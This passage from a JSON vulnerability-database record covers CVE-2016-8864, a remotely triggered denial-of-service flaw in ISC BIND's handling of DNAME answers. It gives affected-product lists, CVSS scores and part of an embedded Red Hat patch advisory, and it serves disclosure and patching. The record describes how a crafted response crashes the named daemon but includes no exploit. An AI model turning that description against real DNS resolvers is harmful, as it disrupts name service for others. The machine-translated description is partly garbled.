        "_id": null,
        "model": "bind",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "isc",
        "version": "9.10.0 from  9.10.4-p3"
      },
      {
        "_id": null,
        "model": "bind",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "isc",
        "version": "9.9.0 from  9.9.9-p3"
      },
      {
        "_id": null,
        "model": "bind",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "isc",
        "version": "9.9.3-s1 from  9.9.9-s5"
      },
      {
        "_id": null,
        "model": "bind",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "isc",
        "version": "9.2.4"
      },
      {
        "_id": null,
        "model": "bind",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "isc",
        "version": "9.0.0"
      },
      {
        "_id": null,
        "model": "junos 15.1x49-d60",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 15.1x49-d40",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 15.1x49-d30",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 15.1x49-d20",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 15.1x49-d15",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 15.1x49-d10",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.3x48-d40",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.3x48-d35",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.3x48-d30",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.3x48-d25",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.3x48-d20",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.3x48-d15",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.3x48-d10",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.1x46-d60",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.1x46-d55",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.1x46-d51",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.1x46-d50",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.1x46-d46",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.1x46-d45",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.1x46-d40",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.1x46-d37",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.1x46-d36",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.1x46-d35",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.1x46-d30",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.1x46-d26",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.1x46-d25",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.1x46-d20",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.1x46-d15",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.1x46-d10",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "powerkvm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "_id": null,
        "model": "powerkvm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "_id": null,
        "model": "netezza host management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.4.4"
      },
      {
        "_id": null,
        "model": "netezza host management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.4.3"
      },
      {
        "_id": null,
        "model": "netezza host management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.4.6.0"
      },
      {
        "_id": null,
        "model": "netezza host management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.9.0"
      },
      {
        "_id": null,
        "model": "netezza host management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.8.0"
      },
      {
        "_id": null,
        "model": "netezza host management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.7.0"
      },
      {
        "_id": null,
        "model": "netezza host management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.6.0"
      },
      {
        "_id": null,
        "model": "netezza host management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.3"
      },
      {
        "_id": null,
        "model": "netezza host management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.2.0"
      },
      {
        "_id": null,
        "model": "netezza host management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.10.0"
      },
      {
        "_id": null,
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "_id": null,
        "model": "hp-ux bind b.11.31",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "_id": null,
        "model": "big-ip websafe",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "_id": null,
        "model": "big-ip websafe",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "_id": null,
        "model": "big-ip websafe",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "_id": null,
        "model": "big-ip websafe",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "_id": null,
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "_id": null,
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "_id": null,
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "_id": null,
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "_id": null,
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "_id": null,
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "_id": null,
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "_id": null,
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "_id": null,
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "_id": null,
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "_id": null,
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "_id": null,
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "_id": null,
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "_id": null,
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "_id": null,
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "_id": null,
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "_id": null,
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "_id": null,
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "_id": null,
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "_id": null,
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "_id": null,
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "_id": null,
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "_id": null,
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "_id": null,
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "_id": null,
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "_id": null,
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "_id": null,
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "_id": null,
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "_id": null,
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "_id": null,
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "_id": null,
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "_id": null,
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "_id": null,
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "_id": null,
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "_id": null,
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "_id": null,
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "_id": null,
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "_id": null,
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "_id": null,
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "_id": null,
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "_id": null,
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "_id": null,
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "_id": null,
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "_id": null,
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "_id": null,
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "_id": null,
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.0"
      },
      {
        "_id": null,
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "_id": null,
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "_id": null,
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "_id": null,
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "_id": null,
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "_id": null,
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "_id": null,
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "_id": null,
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "_id": null,
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "_id": null,
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "_id": null,
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "_id": null,
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "_id": null,
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "_id": null,
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "_id": null,
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.0"
      },
      {
        "_id": null,
        "model": "junos 15.1x49-d70",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.3x48-d45",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "_id": null,
        "model": "junos 12.1x46-d65",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "94067"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201610-898"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005674"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8864"
      }
    ]
  },
  "configurations": {
    "_id": null,
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:isc:bind",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005674"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "and others, Marco Davids (SIDN Labs),ony Finch (University of Cambridge)",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201610-898"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2016-8864",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2016-8864",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.9,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2016-8864",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2016-8864",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2016-8864",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2016-8864",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201610-898",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2016-8864",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-8864"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201610-898"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005674"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8864"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "named in ISC BIND 9.x before 9.9.9-P4, 9.10.x before 9.10.4-P4, and 9.11.x before 9.11.0-P1 allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a DNAME record in the answer section of a response to a recursive query, related to db.c and resolver.c. ISC BIND Is DNAME There is a problem with the response packet containing the record, db.c Or resolver.c so assertion failture ( Violation of representation ) And the result named May end abnormally. (resolver.c so assertion failure If this happens \"INSIST((valoptions \u0026 0x0002U) != 0) failed\" , db.c so assertion failure If this happens \"REQUIRE(targetp != ((void *)0) \u0026\u0026 *targetp == ((void *)0)) failed\" Is displayed. ) According to the developer, 2016 Year 11 Moon 2 No attacks have been observed as of the day, but queries that cause crashes are mentioned on the public mailing list. Supplementary information : CWE Vulnerability type by CWE-19: Data Handling ( Data processing ) Has been identified. https://cwe.mitre.org/data/definitions/19.htmlService disruption by a remote third party (DoS) An attack may be carried out. ISC BIND is prone to a remote denial-of-service vulnerability. \nAttackers can exploit this issue to crash the application, resulting in a denial-of-service condition. \nISC BIND versions 9.0.x through 9.8.x, 9.9.0 through 9.9.9-P3, 9.9.3-S1 through 9.9.9-S5, 9.10.0 through 9.10.4-P3 and  9.11.0 are vulnerable. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: bind security update\nAdvisory ID:       RHSA-2016:2871-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2016-2871.html\nIssue date:        2016-12-06\nCVE Names:         CVE-2016-8864 \n=====================================================================\n\n1. Summary:\n\nAn update for bind is now available for Red Hat Enterprise Linux 6.2\nAdvanced Update Support, Red Hat Enterprise Linux 6.4 Advanced Update\nSupport, Red Hat Enterprise Linux 6.5 Advanced Update Support, Red Hat\nEnterprise Linux 6.5 Telco Extended Update Support, Red Hat Enterprise\nLinux 6.6 Advanced Update Support, Red Hat Enterprise Linux 6.6 Telco\nExtended Update Support, and Red Hat Enterprise Linux 6.7 Extended Update\nSupport. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux HPC Node EUS (v. 6.7) - x86_64\nRed Hat Enterprise Linux HPC Node Optional EUS (v. 6.7) - x86_64\nRed Hat Enterprise Linux Server AUS (v. 6.2) - x86_64\nRed Hat Enterprise Linux Server AUS (v. 6.4) - x86_64\nRed Hat Enterprise Linux Server AUS (v. 6.5) - x86_64\nRed Hat Enterprise Linux Server AUS (v. 6.6) - x86_64\nRed Hat Enterprise Linux Server EUS (v. 6.7) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 6.2) - x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 6.4) - x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 6.5) - x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 6.6) - x86_64\nRed Hat Enterprise Linux Server Optional EUS (v. 6.7) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional TUS (v. 6.5) - x86_64\nRed Hat Enterprise Linux Server Optional TUS (v. 6.6) - x86_64\nRed Hat Enterprise Linux Server TUS (v. 6.5) - x86_64\nRed Hat Enterprise Linux Server TUS (v. 6.6) - x86_64\n\n3. Description:\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly. \n\nSecurity Fix(es):\n\n* A denial of service flaw was found in the way BIND handled responses\ncontaining a DNAME answer. (CVE-2016-8864)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Tony Finch (University of Cambridge) and Marco Davids (SIDN\nLabs) as the original reporters. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nAfter installing the update, the BIND daemon (named) will be restarted\nautomatically. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1389652 - CVE-2016-8864 bind: assertion failure while handling responses containing a DNAME answer\n\n6. Package List:\n\nRed Hat Enterprise Linux HPC Node EUS (v. 6.7):\n\nSource:\nbind-9.8.2-0.37.rc1.el6_7.9.src.rpm\n\nx86_64:\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.9.i686.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.9.i686.rpm\nbind-libs-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm\nbind-utils-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional EUS (v. 6.7):\n\nx86_64:\nbind-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm\nbind-chroot-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.9.i686.rpm\nbind-debuginfo-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.9.i686.rpm\nbind-devel-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm\nbind-sdb-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm\n\nRed Hat Enterprise Linux Server AUS (v. 6.2):\n\nSource:\nbind-9.7.3-8.P3.el6_2.6.src.rpm\n\nx86_64:\nbind-9.7.3-8.P3.el6_2.6.x86_64.rpm\nbind-chroot-9.7.3-8.P3.el6_2.6.x86_64.rpm\nbind-debuginfo-9.7.3-8.P3.el6_2.6.i686.rpm\nbind-debuginfo-9.7.3-8.P3.el6_2.6.x86_64.rpm\nbind-libs-9.7.3-8.P3.el6_2.6.i686.rpm\nbind-libs-9.7.3-8.P3.el6_2.6.x86_64.rpm\nbind-utils-9.7.3-8.P3.el6_2.6.x86_64.rpm\n\nRed Hat Enterprise Linux Server AUS (v. 6.4):\n\nSource:\nbind-9.8.2-0.17.rc1.el6_4.10.src.rpm\n\nx86_64:\nbind-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm\nbind-chroot-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm\nbind-debuginfo-9.8.2-0.17.rc1.el6_4.10.i686.rpm\nbind-debuginfo-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm\nbind-libs-9.8.2-0.17.rc1.el6_4.10.i686.rpm\nbind-libs-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm\nbind-utils-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm\n\nRed Hat Enterprise Linux Server AUS (v. 6.5):\n\nSource:\nbind-9.8.2-0.23.rc1.el6_5.5.src.rpm\n\nx86_64:\nbind-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm\nbind-chroot-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.5.i686.rpm\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm\nbind-libs-9.8.2-0.23.rc1.el6_5.5.i686.rpm\nbind-libs-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm\nbind-utils-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server TUS (v. 6.5):\n\nSource:\nbind-9.8.2-0.23.rc1.el6_5.5.src.rpm\n\nx86_64:\nbind-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm\nbind-chroot-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.5.i686.rpm\nbind-debuginfo-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm\nbind-libs-9.8.2-0.23.rc1.el6_5.5.i686.rpm\nbind-libs-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm\nbind-utils-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server AUS (v. 6.6):\n\nSource:\nbind-9.8.2-0.30.rc1.el6_6.7.src.rpm\n\nx86_64:\nbind-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm\nbind-chroot-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm\nbind-debuginfo-9.8.2-0.30.rc1.el6_6.7.i686.rpm\nbind-debuginfo-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm\nbind-libs-9.8.2-0.30.rc1.el6_6.7.i686.rpm\nbind-libs-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm\nbind-utils-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server TUS (v. 6.6):\n\nSource:\nbind-9.8.2-0.30.rc1.el6_6.7.src.rpm\n\nx86_64:\nbind-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm\nbind-chroot-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm\nbind-debuginfo-9.8.2-0.30.rc1.el6_6.7.i686.rpm\nbind-debuginfo-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm\nbind-libs-9.8.2-0.30.rc1.el6_6.7.i686.rpm\nbind-libs-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm\nbind-utils-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server EUS (v. 